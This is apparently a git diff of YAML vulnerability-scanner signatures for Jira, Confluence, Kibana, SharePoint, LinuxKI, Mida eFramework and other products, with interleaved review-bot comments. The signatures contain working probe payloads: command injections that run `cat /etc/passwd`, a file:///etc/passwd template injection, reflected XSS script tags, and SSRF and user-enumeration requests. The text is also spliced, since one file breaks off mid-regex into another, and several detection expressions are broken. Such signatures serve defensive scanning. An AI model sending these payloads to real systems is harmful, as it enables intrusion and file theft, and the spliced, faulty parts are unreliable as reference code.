+ - X-Atlassian-Token: no-check
+ - Accept-Encoding: gzip, deflate
+ - Accept-Language: en-US,en;q=0.9
+ body: {'jql':'project in projectsLeadByUser("g147isalive")'}
+ detections:
+ - >-
+ StringSearch("resBody", "the user does not exist")
+
+references:
+ - https://www.cvebase.com/cve/2019/8446
diff --git a/cves/jira-info-leak-cve-2019-8449.yaml b/cves/jira-info-leak-cve-2019-8449.yaml
new file mode 100644
index 0000000..1573ebf
--- /dev/null
+++ b/cves/jira-info-leak-cve-2019-8449.yaml
@@ -0,0 +1,22 @@
+id: CVE-2019-8449
+info:
+ name: Jira Information Leak
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ rest/api/latest/groupuserpicker
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?query=1&maxResults=50000&showAvatar=true
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", '{"users":{"users":')
+references:
+ - https://www.cvebase.com/cve/2019/8449
diff --git a/cves/jira-info-leak-cve-2020-14179.yaml b/cves/jira-info-leak-cve-2020-14179.yaml
new file mode 100644
index 0000000..e803303
--- /dev/null
+++ b/cves/jira-info-leak-cve-2020-14179.yaml
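Review bot: `body: {'jql':'project in projectsLeadByUser("g147isalive")'}` is an unquoted YAML flow mapping, so the loader hands the engine a map rather than the string the endpoint expects, and what is actually sent depends on the engine's map-to-string conversion rather than on this file. Quote it like the other body-bearing signatures do, e.g. `body: '{"jql":"project in projectsLeadByUser(\"g147isalive\")"}'`, and add `- Content-Type: application/json` as CVE-2020-10199 does, since a JSON REST endpoint will otherwise likely reject the request before the JQL is evaluated. The detection has no status check either, so any page that mentions "the user does not exist" will match; `StatusCode() == 200 && …` would bring it in line with the rest of the set.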
@@ -0,0 +1,24 @@
+id: CVE-2020-14179
+info:
+ name: Jira Information Leak
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ secure/QueryComponent
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}!Default.jspa
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - Referer: "{{.root}}/webadmin/admin/service_manager_data.php"
+ detections:
+ - >-
+ StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups")
+
+references:
+ - https://www.cvebase.com/cve/2020/14179
diff --git a/cves/jira-lfi.yaml b/cves/jira-lfi.yaml
deleted file mode 100644
index 003be10..0000000
--- a/cves/jira-lfi.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-# info to search signature
-id: cve-jira-01
-info:
- name: Confluence LFI CVE-2019-3396
-
-requests:
- - method: POST
- redirect: false
- url: >-
- {{.BaseURL}}/rest/tinymce/1/macro/preview
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
- - Accept: text/plain, */*; q=0.01
- - Content-Type: application/json
- - X-Requested-With: XMLHttpRequest
- - Referer: "{{.URL}}"
- - Connection: keep-alive
- body: >-
- {"contentId":"1","macro":{"name":"widget","params":{"url":"https://www.viddler.com/v/test","width":"1000","height":"1000","_template":"file:///etc/passwd"},"body":""}}
-
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", "root:x:0:0:root") && StringSearch("response", "root:x:0:0:root")
- - >-
- StatusCode() == 200 && StringSearch("response", "/bin/bash")
-
-# [optional] just reference info
-reference:
- author: whatever
- links:
- - https://example.com
\ No newline at end of file
diff --git a/cves/jira-path-traversal-cve-2019-8442.yaml b/cves/jira-path-traversal-cve-2019-8442.yaml
new file mode 100644
index 0000000..768da07
--- /dev/null
+++ b/cves/jira-path-traversal-cve-2019-8442.yaml
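Review bot: The detection expression is missing its closing parenthesis — `StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups")` opens a group it never closes, so the expression cannot parse and this signature never fires. It should read `StatusCode() == 200 && (StringSearch("resBody", "searchers") || StringSearch("resBody", "groups"))`. The `Referer: "{{.root}}/webadmin/admin/service_manager_data.php"` header is lifted from the Netsweeper signature (CVE-2020-13167) and plays no part in a Jira probe; `{{.root}}` already ends in `/`, so it also produces a double slash — drop the line.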
@@ -0,0 +1,23 @@
+id: CVE-2019-8442
+info:
+ name: Jira Webroot Path Traversal
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
+ s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StringSearch("resBody", "artifactId")
+references:
+ - https://www.cvebase.com/cve/2019/8442
diff --git a/cves/jira-ssrf-cve-2017-9506.yaml b/cves/jira-ssrf-cve-2017-9506.yaml
new file mode 100644
index 0000000..38134a7
--- /dev/null
+++ b/cves/jira-ssrf-cve-2017-9506.yaml
@@ -0,0 +1,22 @@
+id: CVE-2017-9506
+info:
+ name: Jira SSRF
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ plugins/servlet/oauth/users/icon-uri
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?consumerUri=https://ipinfo.io/json
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StringSearch("resBody", "ipinfo.io/missingauth")
+references:
+ - https://www.cvebase.com/cve/2017/9506
diff --git a/cves/jira-ssrf-cve-2019-8451.yaml b/cves/jira-ssrf-cve-2019-8451.yaml
new file mode 100644
index 0000000..99e491f
--- /dev/null
+++ b/cves/jira-ssrf-cve-2019-8451.yaml
@@ -0,0 +1,23 @@
+id: CVE-2019-8451
+info:
+ name: Jira SSRF
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ plugins/servlet/gadgets/makeRequest
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?url=https://{{Hostname}}:1337@example.com
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ - X-Atlassian-token: no-check
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", 'This domain is for use in illustrative examples in documents.')
+references:
+ - https://www.cvebase.com/cve/2019/8451
diff --git a/cves/jira-ssrf.yaml b/cves/jira-ssrf.yaml
deleted file mode 100644
index 4f8731b..0000000
--- a/cves/jira-ssrf.yaml
+++ /dev/null
@@ -1,31 +0,0 @@
-# info to search signature
-id: cve-jira-02
-type: list
-info:
- name: Jira SSRF CVE-2019-8451
- risk: Medium
-
-variables:
- - jira: |
- /
- /jira/
- /wiki/
- /confluence/
- - ssrf: |
- google.com
- example.com
-
-requests:
- - method: GET
- redirect: true
- url: >-
- {{.BaseURL}}{{.jira}}plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@{{.ssrf}}
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
- - X-Atlassian-Token: no-check
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", '{"rc":200')
-
-reference:
- - link: https://jira.atlassian.com/browse/JRASERVER-70018
\ No newline at end of file
diff --git a/cves/jira-ssti-cve-2019-11581.yaml b/cves/jira-ssti-cve-2019-11581.yaml
new file mode 100644
index 0000000..49c4cd9
--- /dev/null
+++ b/cves/jira-ssti-cve-2019-11581.yaml
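Review bot: `{{Hostname}}` in the URL has no leading dot, unlike every other placeholder in these files (`{{.BaseURL}}`, `{{.root}}`, `{{.endpoint}}`); in a Go-template style engine that is a function call rather than a field reference, so the template either fails to render or emits something other than the target host, and the signature then never reaches the detection. Use the dotted field the engine exposes for the host, or replace it with the fixed value the deleted `jira-ssrf.yaml` used. Note also that the detection matches the example.com landing text, so the result depends on an external site answering; the removed file's `'{"rc":200'` check on the makeRequest wrapper did not have that dependency.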
@@ -0,0 +1,22 @@
+id: CVE-2019-11581
+info:
+ name: Jira SSTI
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ secure/ContactAdministrators
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}!default.jspa
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "Contact Site Administrators") && StringSearch("resBody", "Request details")
+references:
+ - https://www.cvebase.com/cve/2019/11581
diff --git a/cves/jira-user-enumeration-cve-2020-14181.yaml b/cves/jira-user-enumeration-cve-2020-14181.yaml
new file mode 100644
index 0000000..5d467f9
--- /dev/null
+++ b/cves/jira-user-enumeration-cve-2020-14181.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-14181
+info:
+ name: Jira User Enumeration
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ secure/ViewUserHover.jspa
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "User does not exist")
+
+references:
+ - https://www.cvebase.com/cve/2020/14181
diff --git a/cves/jira-xss-cve-2018-20824.yaml b/cves/jira-xss-cve-2018-20824.yaml
new file mode 100644
index 0000000..4ab7d41
--- /dev/null
+++ b/cves/jira-xss-cve-2018-20824.yaml
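Review bot: The CVE-2019-11581 detection — `StatusCode() == 200 && StringSearch("resBody", "Contact Site Administrators") && StringSearch("resBody", "Request details")` — only establishes that the contact-administrators form is served; nothing in the request exercises the template issue, so a High-risk signature fires on presumably any Jira that has the form enabled, patched or not. Either lower `risk`, add a version condition, or say in `info` that this is a presence check for the affected feature rather than a confirmation. The user-enumeration hunk that follows has the same shape: a bare `ViewUserHover.jspa` request with no user parameter returning "User does not exist" shows the endpoint answers unauthenticated, and should be labelled as such.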
@@ -0,0 +1,22 @@
+id: CVE-2018-20824
+info:
+ name: Atlassian Jira XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ plugins/servlet/Wallboard/
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "(?mi)timeout:\salert\(document\.domain\)")
+references:
+ - https://www.cvebase.com/cve/2018/20824
diff --git a/cves/jira-xss-cve-2020-9344.yaml b/cves/jira-xss-cve-2020-9344.yaml
new file mode 100644
index 0000000..fbd87b5
--- /dev/null
+++ b/cves/jira-xss-cve-2020-9344.yaml
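Review bot: The regex `"(?mi)timeout:\salert\(document\.domain\)"` is written inside a double-quoted string with single backslashes, while CVE-2020-16952 double-escapes in the same position (`"15\\.0\\.0\\.(…)"`) and CVE-2020-5284 puts single backslashes inside single quotes. If the expression language processes backslash escapes in double-quoted strings, `\s` is an invalid escape and `\(` / `\.` lose their meaning here; if it does not, the CVE-2020-16952 pattern is over-escaped and matches a literal backslash — one of the two conventions is wrong, and only a run against the engine tells which. Settle on one form (the single-quoted style `'(?mi)timeout:\salert\(document\.domain\)'` sidesteps the question) and apply it to every new regex. `dashboardId=10000` is also passed twice in the query; if that is not deliberate, drop one copy.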
@@ -0,0 +1,49 @@
+id: CVE-2020-9344
+info:
+ name: Jira Subversion ALM XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+
+requests:
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/error.jsp?errormessage=%27%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&description=test
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+ - method: GET
+ url: >-
+ {{.root}}plugins/servlet/svnwebclient/statsItem.jsp?url=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "")
+
+references:
+ - https://www.cvebase.com/cve/2020/9344
diff --git a/cves/jolokia-xss-cve-2018-1000129.yaml b/cves/jolokia-xss-cve-2018-1000129.yaml
new file mode 100644
index 0000000..89af44e
--- /dev/null
+++ b/cves/jolokia-xss-cve-2018-1000129.yaml
@@ -0,0 +1,23 @@
+id: CVE-2018-1000129
+info:
+ name: Jolokia XSS
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ jolokia/
+ api/jolokia/
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}read?mimeType=text/html
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "") && StringSearch("resHeader", "text/html")
+references:
+ - https://www.cvebase.com/cve/2018/1000129
diff --git a/cves/kibana-timelion-code-execution-cve-2019-7609.yaml b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
new file mode 100644
index 0000000..9fa12a2
--- /dev/null
+++ b/cves/kibana-timelion-code-execution-cve-2019-7609.yaml
@@ -0,0 +1,24 @@
+id: CVE-2019-7609
+info:
+ name: Kibana Timelion Code Execution
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ api/timelion/run
+requests:
+ - method: POST
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "seriesList") && StringSearch("resHeaders", "Content-Type: application/json")
+
+references:
+ - https://www.cvebase.com/cve/2019/7609
diff --git a/cves/kong-api-improper-authorization-cve-2020-11710.yaml b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
new file mode 100644
index 0000000..0931e98
--- /dev/null
+++ b/cves/kong-api-improper-authorization-cve-2020-11710.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-11710
+info:
+ name: Kong API Improper Authorization
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ status
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && (StringSearch("resBody", "kong_env") || StringSearch("resBody", "kong_db_cache_miss"))
+
+references:
+ - https://www.cvebase.com/cve/2020/11710
diff --git a/cves/kong-cve-2020-11710 copy.yaml b/cves/kong-cve-2020-11710 copy.yaml
deleted file mode 100644
index 20e4a70..0000000
--- a/cves/kong-cve-2020-11710 copy.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: kong-cve-2020-11710
-info:
- name: Kong Admin API
- risk: High
-
-params:
- - root: '{{.BaseURL}}'
-
-variables:
- - end: |
- /
- /status
-requests:
- - method: GET
- url: >-
- {{.root}}{{.end}}
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", "kong_env")
- - >-
- StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss")
-
-reference:
- - link: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw
\ No newline at end of file
diff --git a/cves/kong-cve-2020-11710.yaml b/cves/kong-cve-2020-11710.yaml
deleted file mode 100644
index 20e4a70..0000000
--- a/cves/kong-cve-2020-11710.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: kong-cve-2020-11710
-info:
- name: Kong Admin API
- risk: High
-
-params:
- - root: '{{.BaseURL}}'
-
-variables:
- - end: |
- /
- /status
-requests:
- - method: GET
- url: >-
- {{.root}}{{.end}}
- headers:
- - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
- detections:
- - >-
- StatusCode() == 200 && StringSearch("response", "kong_env")
- - >-
- StatusCode() == 200 && StringSearch("response", "kong_db_cache_miss")
-
-reference:
- - link: https://mp.weixin.qq.com/s/Ttpe63H9lQe87Uk0VOyMFw
\ No newline at end of file
diff --git a/cves/kubelet-pprof-exposed-cve-2019-11248.yaml b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
new file mode 100644
index 0000000..7ee4fa1
--- /dev/null
+++ b/cves/kubelet-pprof-exposed-cve-2019-11248.yaml
@@ -0,0 +1,22 @@
+id: CVE-2019-11248
+info:
+ name: Kubelet PProf Exposed
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ debug/pprof/
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StringSearch("resBody", "Types of profiles available:") || StringSearch("resBody", "Profile Descriptions")
+references:
+ - https://www.cvebase.com/cve/2019/11248
diff --git a/cves/kubernetes-improper-authentication-cve-2018-18264.yaml b/cves/kubernetes-improper-authentication-cve-2018-18264.yaml
new file mode 100644
index 0000000..a267044
--- /dev/null
+++ b/cves/kubernetes-improper-authentication-cve-2018-18264.yaml
@@ -0,0 +1,23 @@
+id: CVE-2018-18264
+info:
+ name: Kubernetes Improper Authentication
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}'
+
+
+variables:
+ - endpoints: |
+ /api/v1/
+ /k8s/api/v1/
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}{{.endpoints}}namespaces/kube-system/secrets/kubernetes-dashboard-certs
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("response", "apiVersion") && StringSearch("response", "objectRef")
+references:
+ - https://www.cvebase.com/cve/2018/18264
\ No newline at end of file
diff --git a/cves/linuxki-rce-cve-2020-7209.yaml b/cves/linuxki-rce-cve-2020-7209.yaml
new file mode 100644
index 0000000..b25b1ac
--- /dev/null
+++ b/cves/linuxki-rce-cve-2020-7209.yaml
@@ -0,0 +1,24 @@
+id: CVE-2020-7209
+info:
+ name: LinuxKI Toolset RCE
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ linuxki/experimental/vis/kivis.php
+
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END;
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+
+references:
+ - https://www.cvebase.com/cve/2020/7209
diff --git a/cves/lotus-domino-info-leak-cve-2005-2428.yaml b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
new file mode 100644
index 0000000..d9cd776
--- /dev/null
+++ b/cves/lotus-domino-info-leak-cve-2005-2428.yaml
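Review bot: This file diverges from every other new signature in the set: `root` has no trailing slash, the `endpoints` entries carry a leading slash, there is no `headers:` block, and the detection reads `"response"` instead of `"resBody"` — the last point matters if `response` is not an alias the engine still honours, since the check would then never match. Bringing it to the common shape (`root: '{{.BaseURL}}/'`, `endpoint: |` with `api/v1/` and `k8s/api/v1/`, `StringSearch("resBody", …)`) keeps the files greppable and behaviourally uniform. If the legacy key is intentionally kept because the engine accepts both, a one-line comment saying so would stop the next reader from "fixing" it.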
@@ -0,0 +1,21 @@
+id: CVE-2005-2428
+info:
+ name: Lotus Domino Sensitive Information Leak
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+requests:
+ - method: GET
+ redirect: false
+ url: >-
+ {{.root}}names.nsf/People?OpenView
+ headers:
+ - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch('resBody', '(- + {{.root}}index.php/catalogsearch/advanced/result/?name=e
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 503 && StringSearch("resBody", "Too many connections")
+
+references:
+ - https://www.cvebase.com/cve/2020/5777
diff --git a/cves/magento-magmi-xss-cve-2017-7391.yaml b/cves/magento-magmi-xss-cve-2017-7391.yaml
new file mode 100644
index 0000000..f928e9b
--- /dev/null
+++ b/cves/magento-magmi-xss-cve-2017-7391.yaml
@@ -0,0 +1,22 @@
+id: CVE-2017-7391
+info:
+ name: Magento MAGMI XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ magmi/web/ajax_gettime.php
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?prefix=%22%3E%3Cscript%3Ealert("cvebase");%3C/script%3E%3C
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", '"><')
+references:
+ - https://www.cvebase.com/cve/2017/7391
diff --git a/cves/mara-cms-reflective-xss-cve-2020-24223.yaml b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
new file mode 100644
index 0000000..b486076
--- /dev/null
+++ b/cves/mara-cms-reflective-xss-cve-2020-24223.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-24223
+info:
+ name: Mara CMS Reflective XSS
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ contact.php
+requests:
+ - method: POST
+ url: >-
+ {{.root}}{{.endpoint}}?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", '">')
+
+references:
+ - https://www.cvebase.com/cve/2020/24223
diff --git a/cves/mida-eframework-rce-cve-2020-15920.yaml b/cves/mida-eframework-rce-cve-2020-15920.yaml
new file mode 100644
index 0000000..7d00c51
--- /dev/null
+++ b/cves/mida-eframework-rce-cve-2020-15920.yaml
@@ -0,0 +1,23 @@
+id: CVE-2020-15920
+info:
+ name: Mida eFramework RCE
+ risk: Medium
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ PDC/ajaxreq.php
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:")
+
+references:
+ - https://www.cvebase.com/cve/2020/15920
diff --git a/cves/mobileiron-rce-probe.yaml b/cves/mobileiron-rce-cve-2020-15505.yaml
similarity index 71%
rename from cves/mobileiron-rce-probe.yaml
rename to cves/mobileiron-rce-cve-2020-15505.yaml
index aedb7b5..965a1b3 100644
--- a/cves/mobileiron-rce-probe.yaml
+++ b/cves/mobileiron-rce-cve-2020-15505.yaml
@@ -1,6 +1,6 @@ -id: mobileiron-rce-probe +id: CVE-2020-15505 info: - name: Mobileiron RCE Probe CVE-2020-15505 + name: MobileIron RCE risk: Potential params:
@@ -10,7 +10,6 @@ params: variables: - endpoint: | /mifs/.;/services/LogService - requests: - method: POST redirect: false
@@ -25,7 +24,5 @@ requests: detections: - >- StatusCode() == 200 && StringSearch("response", "application/x-hessian") && ContentLength('body') == 0 - references: - - blog: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html - - poc: https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505 \ No newline at end of file + - https://www.cvebase.com/cve/2020/15505 \ No newline at end of file
diff --git a/cves/ms-sharepoint-rce-cve-2020-1147.yaml b/cves/ms-sharepoint-rce-cve-2020-1147.yaml
new file mode 100644
index 0000000..2a97c08
--- /dev/null
+++ b/cves/ms-sharepoint-rce-cve-2020-1147.yaml
@@ -0,0 +1,22 @@
+id: CVE-2020-1147
+info:
+ name: Microsoft Sharepoint Server RCE
+ risk: High
+
+params:
+ - root: '{{.BaseURL}}/'
+
+variables:
+ - endpoint: |
+ _layouts/15/listform.aspx
+requests:
+ - method: GET
+ url: >-
+ {{.root}}{{.endpoint}}?PageType=1&ListId=%7B13371337-1337-1337-1337-133713371337%7D
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
+ StatusCode() == 200 && StringSearch("resBody", "List does mot exist") && StringSearch("resBody", "It may have been deleted by another user") && (StringSearch("resHeader", "Microsoft-IIS") || StringSearch("resHeader", "X-SharePointHealthScore") ||StringSearch("resHeader", "SharePointError") || StringSearch("resHeader", "SPRequestGuid") || StringSearch("resHeader", "MicrosoftSharePointTeamServices"))
+references:
+ - https://www.cvebase.com/cve/2020/1147
diff --git a/cves/ms-sharepoint-rce-cve-2020-16952.yaml b/cves/ms-sharepoint-rce-cve-2020-16952.yaml
new file mode 100644
index 0000000..dfdbb28
--- /dev/null
+++ b/cves/ms-sharepoint-rce-cve-2020-16952.yaml
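Review bot: In the CVE-2020-1147 hunk, `StringSearch("resBody", "List does mot exist")` carries a typo — the page text it is meant to match presumably reads "List does not exist" — so the `&&` chain fails and the signature never fires. Change it to `StringSearch("resBody", "List does not exist")`. Even with that fixed, the remaining clauses only confirm a SharePoint host answering `listform.aspx` for an unknown list, which is true of patched servers too; the file should say in `info` that this is a presence probe, not a confirmation of the deserialization issue.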
@@ -0,0 +1,20 @@
+id: CVE-2020-16952
+info:
+ name: Microsoft SharePoint RCE
+ risk: Critical
+
+params:
+ - root: '{{.BaseURL}}/'
+
+requests:
+ - method: GET
+ url: >-
+ {{.root}}
+ headers:
+ - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
+ detections:
+ - >-
